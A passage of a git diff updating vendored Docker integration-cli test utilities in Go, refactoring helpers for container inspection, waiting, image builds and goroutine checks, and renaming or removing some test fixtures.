-	err = os.Chdir(repoPath)
-	if err != nil {
-		os.RemoveAll(root)
-		return nil, err
-	}
-	if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil {
-		os.RemoveAll(root)
-		return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output)
-	}
-	err = os.Chdir(curdir)
-	if err != nil {
-		os.RemoveAll(root)
-		return nil, err
-	}
-
-	var server gitServer
-	if !enforceLocalServer {
-		// use fakeStorage server, which might be local or remote (at test daemon)
-		server, err = fakeStorageWithContext(fakeContextFromDir(root))
-		if err != nil {
-			return nil, fmt.Errorf("cannot start fake storage: %v", err)
-		}
-	} else {
-		// always start a local http server on CLI test machine
-		httpServer := httptest.NewServer(http.FileServer(http.Dir(root)))
-		server = &localGitServer{httpServer}
-	}
-	return &fakeGit{
-		root:    root,
-		server:  server,
-		RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name),
-	}, nil
-}
-
-// Write `content` to the file at path `dst`, creating it if necessary,
-// as well as any missing directories.
-// The file is truncated if it already exists.
-// Fail the test when error occurs.
-func writeFile(dst, content string, c *check.C) {
-	// Create subdirectories if necessary
-	c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil)
-	f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
-	c.Assert(err, check.IsNil)
-	defer f.Close()
-	// Write content (truncate if it exists)
-	_, err = io.Copy(f, strings.NewReader(content))
-	c.Assert(err, check.IsNil)
-}
-
-// Return the contents of file at path `src`.
-// Fail the test when error occurs.
-func readFile(src string, c *check.C) (content string) {
-	data, err := ioutil.ReadFile(src)
-	c.Assert(err, check.IsNil)
-
-	return string(data)
-}
-
-func containerStorageFile(containerID, basename string) string {
-	return filepath.Join(containerStoragePath, containerID, basename)
-}
-
-// docker commands that use this function must be run with the '-d' switch.
-func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) {
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		return nil, fmt.Errorf("%v: %q", err, out)
-	}
-
-	contID := strings.TrimSpace(out)
-
-	if err := waitRun(contID); err != nil {
-		return nil, fmt.Errorf("%v: %q", contID, err)
-	}
-
-	return readContainerFile(contID, filename)
-}
-
-func readContainerFile(containerID, filename string) ([]byte, error) {
-	f, err := os.Open(containerStorageFile(containerID, filename))
-	if err != nil {
-		return nil, err
-	}
-	defer f.Close()
-
-	content, err := ioutil.ReadAll(f)
-	if err != nil {
-		return nil, err
-	}
-
-	return content, nil
-}
-
-func readContainerFileWithExec(containerID, filename string) ([]byte, error) {
-	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename))
-	return []byte(out), err
-}
-
-// daemonTime provides the current time on the daemon host
-func daemonTime(c *check.C) time.Time {
-	if isLocalDaemon {
-		return time.Now()
-	}
-
-	status, body, err := sockRequest("GET", "/info", nil)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
-
-	type infoJSON struct {
-		SystemTime string
-	}
-	var info infoJSON
-	err = json.Unmarshal(body, &info)
-	c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response"))
-
-	dt, err := time.Parse(time.RFC3339Nano, info.SystemTime)
-	c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response"))
-	return dt
-}
-
-// daemonUnixTime returns the current time on the daemon host with nanoseconds precision.
-// It return the time formatted how the client sends timestamps to the server.
-func daemonUnixTime(c *check.C) string {
-	return parseEventTime(daemonTime(c))
-}
-
-func parseEventTime(t time.Time) string {
-	return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond()))
-}
-
-func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 {
-	reg, err := newTestRegistryV2(c, schema1, auth, tokenURL)
-	c.Assert(err, check.IsNil)
-
-	// Wait for registry to be ready to serve requests.
-	for i := 0; i != 50; i++ {
-		if err = reg.Ping(); err == nil {
-			break
-		}
-		time.Sleep(100 * time.Millisecond)
-	}
-
-	c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err))
-	return reg
-}
-
-func setupNotary(c *check.C) *testNotary {
-	ts, err := newTestNotary(c)
-	c.Assert(err, check.IsNil)
-
-	return ts
-}
-
-// appendBaseEnv appends the minimum set of environment variables to exec the
-// docker cli binary for testing with correct configuration to the given env
-// list.
-func appendBaseEnv(isTLS bool, env ...string) []string {
-	preserveList := []string{
-		// preserve remote test host
-		"DOCKER_HOST",
-
-		// windows: requires preserving SystemRoot, otherwise dial tcp fails
-		// with "GetAddrInfoW: A non-recoverable error occurred during a database lookup."
-		"SystemRoot",
-
-		// testing help text requires the $PATH to dockerd is set
-		"PATH",
-	}
-	if isTLS {
-		preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH")
-	}
-
-	for _, key := range preserveList {
-		if val := os.Getenv(key); val != "" {
-			env = append(env, fmt.Sprintf("%s=%s", key, val))
-		}
-	}
-	return env
-}
-
-func createTmpFile(c *check.C, content string) string {
-	f, err := ioutil.TempFile("", "testfile")
-	c.Assert(err, check.IsNil)
-
-	filename := f.Name()
-
-	err = ioutil.WriteFile(filename, []byte(content), 0644)
-	c.Assert(err, check.IsNil)
-
-	return filename
-}
-
-func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) {
-	args := []string{"--host", socket}
-	buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache)
-	out, exitCode, err := runCommandWithOutput(buildCmd)
-	if err != nil || exitCode != 0 {
-		return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err)
-	}
-	return out, nil
-}
-
-func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd {
-	args = append(args, []string{"-D", "build", "-t", name}...)
-	if !useCache {
-		args = append(args, "--no-cache")
-	}
-	args = append(args, "-")
-	buildCmd := exec.Command(dockerBinary, args...)
-	buildCmd.Stdin = strings.NewReader(dockerfile)
-	return buildCmd
-
-}
-
-func waitForContainer(contID string, args ...string) error {
-	args = append([]string{dockerBinary, "run", "--name", contID}, args...)
-	result := icmd.RunCmd(icmd.Cmd{Command: args})
-	if result.Error != nil {
-		return result.Error
-	}
-	return waitRun(contID)
-}
-
-// waitRestart will wait for the specified container to restart once
-func waitRestart(contID string, duration time.Duration) error {
-	return waitInspect(contID, "{{.RestartCount}}", "1", duration)
-}
-
-// waitRun will wait for the specified container to be running, maximum 5 seconds.
-func waitRun(contID string) error {
-	return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second)
-}
-
-// waitExited will wait for the specified container to state exit, subject
-// to a maximum time limit in seconds supplied by the caller
-func waitExited(contID string, duration time.Duration) error {
-	return waitInspect(contID, "{{.State.Status}}", "exited", duration)
-}
-
-// waitInspect will wait for the specified container to have the specified string
-// in the inspect output. It will wait until the specified timeout (in seconds)
-// is reached.
-func waitInspect(name, expr, expected string, timeout time.Duration) error {
-	return waitInspectWithArgs(name, expr, expected, timeout)
-}
-
-func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error {
-	after := time.After(timeout)
-
-	args := append(arg, "inspect", "-f", expr, name)
-	for {
-		result := icmd.RunCommand(dockerBinary, args...)
-		if result.Error != nil {
-			if !strings.Contains(result.Stderr(), "No such") {
-				return fmt.Errorf("error executing docker inspect: %v\n%s",
-					result.Stderr(), result.Stdout())
-			}
-			select {
-			case <-after:
-				return result.Error
-			default:
-				time.Sleep(10 * time.Millisecond)
-				continue
-			}
-		}
-
-		out := strings.TrimSpace(result.Stdout())
-		if out == expected {
-			break
-		}
-
-		select {
-		case <-after:
-			return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected)
-		default:
-		}
-
-		time.Sleep(100 * time.Millisecond)
-	}
-	return nil
-}
-
-func getInspectBody(c *check.C, version, id string) []byte {
-	endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id)
-	status, body, err := sockRequest("GET", endpoint, nil)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusOK)
-	return body
-}
-
-// Run a long running idle task in a background container using the
-// system-specific default image and command.
-func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) {
-	return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...)
-}
-
-// Run a long running idle task in a background container using the specified
-// image and the system-specific command.
-func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) {
-	args := []string{"run", "-d"}
-	args = append(args, extraArgs...)
-	args = append(args, image)
-	args = append(args, sleepCommandForDaemonPlatform()...)
-	return dockerCmd(c, args...)
-}
-
-func getRootUIDGID() (int, int, error) {
-	uidgid := strings.Split(filepath.Base(dockerBasePath), ".")
-	if len(uidgid) == 1 {
-		//user namespace remapping is not turned on; return 0
-		return 0, 0, nil
-	}
-	uid, err := strconv.Atoi(uidgid[0])
-	if err != nil {
-		return 0, 0, err
-	}
-	gid, err := strconv.Atoi(uidgid[1])
-	if err != nil {
-		return 0, 0, err
-	}
-	return uid, gid, nil
-}
-
-// minimalBaseImage returns the name of the minimal base image for the current
-// daemon platform.
-func minimalBaseImage() string {
-	if daemonPlatform == "windows" {
-		return WindowsBaseImage
-	}
-	return "scratch"
-}
-
-func getGoroutineNumber() (int, error) {
-	i := struct {
-		NGoroutines int
-	}{}
-	status, b, err := sockRequest("GET", "/info", nil)
-	if err != nil {
-		return 0, err
-	}
-	if status != http.StatusOK {
-		return 0, fmt.Errorf("http status code: %d", status)
-	}
-	if err := json.Unmarshal(b, &i); err != nil {
-		return 0, err
-	}
-	return i.NGoroutines, nil
-}
-
-func waitForGoroutines(expected int) error {
-	t := time.After(30 * time.Second)
-	for {
-		select {
-		case <-t:
-			n, err := getGoroutineNumber()
-			if err != nil {
-				return err
-			}
-			if n > expected {
-				return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n)
-			}
-		default:
-			n, err := getGoroutineNumber()
-			if err != nil {
-				return err
-			}
-			if n <= expected {
-				return nil
-			}
-			time.Sleep(200 * time.Millisecond)
-		}
-	}
-}
-
-// getErrorMessage returns the error message from an error API response
-func getErrorMessage(c *check.C, body []byte) string {
-	var resp types.ErrorResponse
-	c.Assert(json.Unmarshal(body, &resp), check.IsNil)
-	return strings.TrimSpace(resp.Message)
-}
-
-func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) {
-	after := time.After(timeout)
-	for {
-		v, comment := f(c)
-		assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params)
-		select {
-		case <-after:
-			assert = true
-		default:
-		}
-		if assert {
-			if comment != nil {
-				args = append(args, comment)
-			}
-			c.Assert(v, checker, args...)
-			return
-		}
-		time.Sleep(100 * time.Millisecond)
-	}
-}
-
-type checkF func(*check.C) (interface{}, check.CommentInterface)
-type reducer func(...interface{}) interface{}
-
-func reducedCheck(r reducer, funcs ...checkF) checkF {
-	return func(c *check.C) (interface{}, check.CommentInterface) {
-		var values []interface{}
-		var comments []string
-		for _, f := range funcs {
-			v, comment := f(c)
-			values = append(values, v)
-			if comment != nil {
-				comments = append(comments, comment.CheckCommentString())
-			}
-		}
-		return r(values...), check.Commentf("%v", strings.Join(comments, ", "))
-	}
-}
-
-func sumAsIntegers(vals ...interface{}) interface{} {
-	var s int
-	for _, v := range vals {
-		s += v.(int)
-	}
-	return s
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go
new file mode 100644
index 0000000000..1c05bf5d04
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go
@@ -0,0 +1,466 @@
+package main
+
+import (
+	"context"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/go-check/check"
+	"gotest.tools/icmd"
+)
+
+// Deprecated
+func daemonHost() string {
+	return request.DaemonHost()
+}
+
+func deleteImages(images ...string) error {
+	args := []string{dockerBinary, "rmi", "-f"}
+	return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error
+}
+
+// Deprecated: use cli.Docker or cli.DockerCmd
+func dockerCmdWithError(args ...string) (string, int, error) {
+	result := cli.Docker(cli.Args(args...))
+	if result.Error != nil {
+		return result.Combined(), result.ExitCode, result.Compare(icmd.Success)
+	}
+	return result.Combined(), result.ExitCode, result.Error
+}
+
+// Deprecated: use cli.Docker or cli.DockerCmd
+func dockerCmd(c *check.C, args ...string) (string, int) {
+	result := cli.DockerCmd(c, args...)
+	return result.Combined(), result.ExitCode
+}
+
+// Deprecated: use cli.Docker or cli.DockerCmd
+func dockerCmdWithResult(args ...string) *icmd.Result {
+	return cli.Docker(cli.Args(args...))
+}
+
+func findContainerIP(c *check.C, id string, network string) string {
+	out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id)
+	return strings.Trim(out, " \r\n'")
+}
+
+func getContainerCount(c *check.C) int {
+	const containers = "Containers:"
+
+	result := icmd.RunCommand(dockerBinary, "info")
+	result.Assert(c, icmd.Success)
+
+	lines := strings.Split(result.Combined(), "\n")
+	for _, line := range lines {
+		if strings.Contains(line, containers) {
+			output := strings.TrimSpace(line)
+			output = strings.TrimLeft(output, containers)
+			output = strings.Trim(output, " ")
+			containerCount, err := strconv.Atoi(output)
+			c.Assert(err, checker.IsNil)
+			return containerCount
+		}
+	}
+	return 0
+}
+
+func inspectFieldAndUnmarshall(c *check.C, name, field string, output interface{}) {
+	str := inspectFieldJSON(c, name, field)
+	err := json.Unmarshal([]byte(str), output)
+	if c != nil {
+		c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err))
+	}
+}
+
+// Deprecated: use cli.Inspect
+func inspectFilter(name, filter string) (string, error) {
+	format := fmt.Sprintf("{{%s}}", filter)
+	result := icmd.RunCommand(dockerBinary, "inspect", "-f", format, name)
+	if result.Error != nil || result.ExitCode != 0 {
+		return "", fmt.Errorf("failed to inspect %s: %s", name, result.Combined())
+	}
+	return strings.TrimSpace(result.Combined()), nil
+}
+
+// Deprecated: use cli.Inspect
+func inspectFieldWithError(name, field string) (string, error) {
+	return inspectFilter(name, fmt.Sprintf(".%s", field))
+}
+
+// Deprecated: use cli.Inspect
+func inspectField(c *check.C, name, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf(".%s", field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+// Deprecated: use cli.Inspect
+func inspectFieldJSON(c *check.C, name, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf("json .%s", field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+// Deprecated: use cli.Inspect
+func inspectFieldMap(c *check.C, name, path, field string) string {
+	out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field))
+	if c != nil {
+		c.Assert(err, check.IsNil)
+	}
+	return out
+}
+
+// Deprecated: use cli.Inspect
+func inspectMountSourceField(name, destination string) (string, error) {
+	m, err := inspectMountPoint(name, destination)
+	if err != nil {
+		return "", err
+	}
+	return m.Source, nil
+}
+
+// Deprecated: use cli.Inspect
+func inspectMountPoint(name, destination string) (types.MountPoint, error) {
+	out, err := inspectFilter(name, "json .Mounts")
+	if err != nil {
+		return types.MountPoint{}, err
+	}
+
+	return inspectMountPointJSON(out, destination)
+}
+
+var errMountNotFound = errors.New("mount point not found")
+
+// Deprecated: use cli.Inspect
+func inspectMountPointJSON(j, destination string) (types.MountPoint, error) {
+	var mp []types.MountPoint
+	if err := json.Unmarshal([]byte(j), &mp); err != nil {
+		return types.MountPoint{}, err
+	}
+
+	var m *types.MountPoint
+	for _, c := range mp {
+		if c.Destination == destination {
+			m = &c
+			break
+		}
+	}
+
+	if m == nil {
+		return types.MountPoint{}, errMountNotFound
+	}
+
+	return *m, nil
+}
+
+// Deprecated: use cli.Inspect
+func inspectImage(c *check.C, name, filter string) string {
+	args := []string{"inspect", "--type", "image"}
+	if filter != "" {
+		format := fmt.Sprintf("{{%s}}", filter)
+		args = append(args, "-f", format)
+	}
+	args = append(args, name)
+	result := icmd.RunCommand(dockerBinary, args...)
+	result.Assert(c, icmd.Success)
+	return strings.TrimSpace(result.Combined())
+}
+
+func getIDByName(c *check.C, name string) string {
+	id, err := inspectFieldWithError(name, "Id")
+	c.Assert(err, checker.IsNil)
+	return id
+}
+
+// Deprecated: use cli.Build
+func buildImageSuccessfully(c *check.C, name string, cmdOperators ...cli.CmdOperator) {
+	buildImage(name, cmdOperators...).Assert(c, icmd.Success)
+}
+
+// Deprecated: use cli.Build
+func buildImage(name string, cmdOperators ...cli.CmdOperator) *icmd.Result {
+	return cli.Docker(cli.Build(name), cmdOperators...)
+}
+
+// Write `content` to the file at path `dst`, creating it if necessary,
+// as well as any missing directories.
+// The file is truncated if it already exists.
+// Fail the test when error occurs.
+func writeFile(dst, content string, c *check.C) {
+	// Create subdirectories if necessary
+	c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil)
+	f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700)
+	c.Assert(err, check.IsNil)
+	defer f.Close()
+	// Write content (truncate if it exists)
+	_, err = io.Copy(f, strings.NewReader(content))
+	c.Assert(err, check.IsNil)
+}
+
+// Return the contents of file at path `src`.
+// Fail the test when error occurs.
+func readFile(src string, c *check.C) (content string) {
+	data, err := ioutil.ReadFile(src)
+	c.Assert(err, check.IsNil)
+
+	return string(data)
+}
+
+func containerStorageFile(containerID, basename string) string {
+	return filepath.Join(testEnv.PlatformDefaults.ContainerStoragePath, containerID, basename)
+}
+
+// docker commands that use this function must be run with the '-d' switch.
+func runCommandAndReadContainerFile(c *check.C, filename string, command string, args ...string) []byte {
+	result := icmd.RunCommand(command, args...)
+	result.Assert(c, icmd.Success)
+	contID := strings.TrimSpace(result.Combined())
+	if err := waitRun(contID); err != nil {
+		c.Fatalf("%v: %q", contID, err)
+	}
+	return readContainerFile(c, contID, filename)
+}
+
+func readContainerFile(c *check.C, containerID, filename string) []byte {
+	f, err := os.Open(containerStorageFile(containerID, filename))
+	c.Assert(err, checker.IsNil)
+	defer f.Close()
+
+	content, err := ioutil.ReadAll(f)
+	c.Assert(err, checker.IsNil)
+	return content
+}
+
+func readContainerFileWithExec(c *check.C, containerID, filename string) []byte {
+	result := icmd.RunCommand(dockerBinary, "exec", containerID, "cat", filename)
+	result.Assert(c, icmd.Success)
+	return []byte(result.Combined())
+}
+
+// daemonTime provides the current time on the daemon host
+func daemonTime(c *check.C) time.Time {
+	if testEnv.IsLocalDaemon() {
+		return time.Now()
+	}
+	cli, err := client.NewEnvClient()
+	c.Assert(err, check.IsNil)
+	defer cli.Close()
+
+	info, err := cli.Info(context.Background())
+	c.Assert(err, check.IsNil)
+
+	dt, err := time.Parse(time.RFC3339Nano, info.SystemTime)
+	c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response"))
+	return dt
+}
+
+// daemonUnixTime returns the current time on the daemon host with nanoseconds precision.
+// It return the time formatted how the client sends timestamps to the server.
+func daemonUnixTime(c *check.C) string {
+	return parseEventTime(daemonTime(c))
+}
+
+func parseEventTime(t time.Time) string {
+	return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond()))
+}
+
+// appendBaseEnv appends the minimum set of environment variables to exec the
+// docker cli binary for testing with correct configuration to the given env
+// list.
+func appendBaseEnv(isTLS bool, env ...string) []string {
+	preserveList := []string{
+		// preserve remote test host
+		"DOCKER_HOST",
+
+		// windows: requires preserving SystemRoot, otherwise dial tcp fails
+		// with "GetAddrInfoW: A non-recoverable error occurred during a database lookup."
+		"SystemRoot",
+
+		// testing help text requires the $PATH to dockerd is set
+		"PATH",
+	}
+	if isTLS {
+		preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH")
+	}
+
+	for _, key := range preserveList {
+		if val := os.Getenv(key); val != "" {
+			env = append(env, fmt.Sprintf("%s=%s", key, val))
+		}
+	}
+	return env
+}
+
+func createTmpFile(c *check.C, content string) string {
+	f, err := ioutil.TempFile("", "testfile")
+	c.Assert(err, check.IsNil)
+
+	filename := f.Name()
+
+	err = ioutil.WriteFile(filename, []byte(content), 0644)
+	c.Assert(err, check.IsNil)
+
+	return filename
+}
+
+// waitRun will wait for the specified container to be running, maximum 5 seconds.
+// Deprecated: use cli.WaitFor
+func waitRun(contID string) error {
+	return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second)
+}
+
+// waitInspect will wait for the specified container to have the specified string
+// in the inspect output. It will wait until the specified timeout (in seconds)
+// is reached.
+// Deprecated: use cli.WaitFor
+func waitInspect(name, expr, expected string, timeout time.Duration) error {
+	return waitInspectWithArgs(name, expr, expected, timeout)
+}
+
+// Deprecated: use cli.WaitFor
+func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error {
+	return daemon.WaitInspectWithArgs(dockerBinary, name, expr, expected, timeout, arg...)
+}
+
+func getInspectBody(c *check.C, version, id string) []byte {
+	cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion(version))
+	c.Assert(err, check.IsNil)
+	defer cli.Close()
+	_, body, err := cli.ContainerInspectWithRaw(context.Background(), id, false)
+	c.Assert(err, check.IsNil)
+	return body
+}
+
+// Run a long running idle task in a background container using the
+// system-specific default image and command.
+func runSleepingContainer(c *check.C, extraArgs ...string) string {
+	return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...)
+}
+
+// Run a long running idle task in a background container using the specified
+// image and the system-specific command.
+func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) string {
+	args := []string{"run", "-d"}
+	args = append(args, extraArgs...)
+	args = append(args, image)
+	args = append(args, sleepCommandForDaemonPlatform()...)
+	return strings.TrimSpace(cli.DockerCmd(c, args...).Combined())
+}
+
+// minimalBaseImage returns the name of the minimal base image for the current
+// daemon platform.
+func minimalBaseImage() string {
+	return testEnv.PlatformDefaults.BaseImage
+}
+
+func getGoroutineNumber() (int, error) {
+	cli, err := client.NewEnvClient()
+	if err != nil {
+		return 0, err
+	}
+	defer cli.Close()
+
+	info, err := cli.Info(context.Background())
+	if err != nil {
+		return 0, err
+	}
+	return info.NGoroutines, nil
+}
+
+func waitForGoroutines(expected int) error {
+	t := time.After(30 * time.Second)
+	for {
+		select {
+		case <-t:
+			n, err := getGoroutineNumber()
+			if err != nil {
+				return err
+			}
+			if n > expected {
+				return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n)
+			}
+		default:
+			n, err := getGoroutineNumber()
+			if err != nil {
+				return err
+			}
+			if n <= expected {
+				return nil
+			}
+			time.Sleep(200 * time.Millisecond)
+		}
+	}
+}
+
+// getErrorMessage returns the error message from an error API response
+func getErrorMessage(c *check.C, body []byte) string {
+	var resp types.ErrorResponse
+	c.Assert(json.Unmarshal(body, &resp), check.IsNil)
+	return strings.TrimSpace(resp.Message)
+}
+
+func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) {
+	after := time.After(timeout)
+	for {
+		v, comment := f(c)
+		assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params)
+		select {
+		case <-after:
+			assert = true
+		default:
+		}
+		if assert {
+			if comment != nil {
+				args = append(args, comment)
+			}
+			c.Assert(v, checker, args...)
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+type checkF func(*check.C) (interface{}, check.CommentInterface)
+type reducer func(...interface{}) interface{}
+
+func reducedCheck(r reducer, funcs ...checkF) checkF {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		var values []interface{}
+		var comments []string
+		for _, f := range funcs {
+			v, comment := f(c)
+			values = append(values, v)
+			if comment != nil {
+				comments = append(comments, comment.CheckCommentString())
+			}
+		}
+		return r(values...), check.Commentf("%v", strings.Join(comments, ", "))
+	}
+}
+
+func sumAsIntegers(vals ...interface{}) interface{} {
+	var s int
+	for _, v := range vals {
+		s += v.(int)
+	}
+	return s
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/environment/environment.go b/vendor/github.com/docker/docker/integration-cli/environment/environment.go
new file mode 100644
index 0000000000..82cf99652b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/environment/environment.go
@@ -0,0 +1,49 @@
+package environment // import "github.com/docker/docker/integration-cli/environment"
+
+import (
+	"os"
+	"os/exec"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var (
+	// DefaultClientBinary is the name of the docker binary
+	DefaultClientBinary = os.Getenv("TEST_CLIENT_BINARY")
+)
+
+func init() {
+	if DefaultClientBinary == "" {
+		DefaultClientBinary = "docker"
+	}
+}
+
+// Execution contains information about the current test execution and daemon
+// under test
+type Execution struct {
+	environment.Execution
+	dockerBinary string
+}
+
+// DockerBinary returns the docker binary for this testing environment
+func (e *Execution) DockerBinary() string {
+	return e.dockerBinary
+}
+
+// New returns details about the testing environment
+func New() (*Execution, error) {
+	env, err := environment.New()
+	if err != nil {
+		return nil, err
+	}
+
+	dockerBinary, err := exec.LookPath(DefaultClientBinary)
+	if err != nil {
+		return nil, err
+	}
+
+	return &Execution{
+		Execution:    *env,
+		dockerBinary: dockerBinary,
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go
similarity index 98%
rename from vendor/github.com/docker/docker/integration-cli/events_utils.go
rename to vendor/github.com/docker/docker/integration-cli/events_utils_test.go
index ba241796b3..356b2c326d 100644
--- a/vendor/github.com/docker/docker/integration-cli/events_utils.go
+++ b/vendor/github.com/docker/docker/integration-cli/events_utils_test.go
@@ -9,10 +9,10 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	eventstestutils "github.com/docker/docker/daemon/events/testutils"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"github.com/sirupsen/logrus"
 )
 
 // eventMatcher is a function that tries to match an event input.
@@ -69,7 +69,7 @@ func (e *eventObserver) Start() error {
 // Stop stops the events command.
 func (e *eventObserver) Stop() {
 	e.command.Process.Kill()
-	e.command.Process.Release()
+	e.command.Wait()
 }
 
 // Match tries to match the events output with a given matcher.
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go
deleted file mode 100644
index e99b738158..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"sync"
-)
-
-var ensureHTTPServerOnce sync.Once
-
-func ensureHTTPServerImage() error {
-	var doIt bool
-	ensureHTTPServerOnce.Do(func() {
-		doIt = true
-	})
-
-	if !doIt {
-		return nil
-	}
-
-	protectedImages["httpserver:latest"] = struct{}{}
-
-	tmp, err := ioutil.TempDir("", "docker-http-server-test")
-	if err != nil {
-		return fmt.Errorf("could not build http server: %v", err)
-	}
-	defer os.RemoveAll(tmp)
-
-	goos := daemonPlatform
-	if goos == "" {
-		goos = "linux"
-	}
-	goarch := os.Getenv("DOCKER_ENGINE_GOARCH")
-	if goarch == "" {
-		goarch = "amd64"
-	}
-
-	goCmd, lookErr := exec.LookPath("go")
-	if lookErr != nil {
-		return fmt.Errorf("could not build http server: %v", lookErr)
-	}
-
-	cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver")
-	cmd.Env = append(os.Environ(), []string{
-		"CGO_ENABLED=0",
-		"GOOS=" + goos,
-		"GOARCH=" + goarch,
-	}...)
-	var out []byte
-	if out, err = cmd.CombinedOutput(); err != nil {
-		return fmt.Errorf("could not build http server: %s", string(out))
-	}
-
-	cpCmd, lookErr := exec.LookPath("cp")
-	if lookErr != nil {
-		return fmt.Errorf("could not build http server: %v", lookErr)
-	}
-	if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil {
-		return fmt.Errorf("could not build http server: %v", string(out))
-	}
-
-	if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil {
-		return fmt.Errorf("could not build http server: %v", string(out))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
index a7be56b2f2..97b3f1483e 100755
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 set -e
 
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
deleted file mode 100644
index f30c04f8f1..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
+++ /dev/null
@@ -1,9 +0,0 @@
-
-version: "3"
-services:
-  web:
-    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
-    command: top
-  db:
